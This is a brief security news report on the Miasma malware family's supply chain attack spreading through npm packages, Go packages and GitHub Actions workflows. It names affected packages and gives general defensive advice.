Miasma Malware Expands to npm and GitHub Actions in Supply Chain Attack

Cybersecurity researchers have identified an evolution of the supply chain attack tied to the Mini Shai-Hulud, Miasma, and Hades malware family, which has compromised a fresh set of npm packages and expanded into the Go ecosystem. The latest activity includes malicious npm releases affecting LeoPlatform and RStreams packages, alongside GitHub Actions workflow abuse.

The attack leverages poisoned software dependencies to infiltrate development pipelines, a method that amplifies its reach by targeting widely used package registries. While specific CVSS scores and exploitation timelines remain undisclosed, the inclusion of GitHub Actions workflow abuse indicates a capability to compromise automated build and deployment processes.

Technical analysis reveals that Miasma propagates through malicious npm packages that embed code to harvest credentials or execute additional payloads. The shift to affecting Go packages suggests an effort to broaden the attack surface beyond Node.js environments. Indicators of compromise (IoCs) include the specific packages: LeoPlatform and RStreams, along with anomalous GitHub Actions logs.

No patches or mitigations have been formally released by npm or GitHub at this time. Development teams are advised to audit dependencies for these packages and review GitHub Actions workflows for unauthorized changes. Security vendors recommend pinning package versions and enabling two-factor authentication on registry accounts.

The malware family, previously associated with attacks on open-source ecosystems, continues to evolve its tactics. Attribution remains unclear, but the supply chain vector underscores persistent threats to software development infrastructure.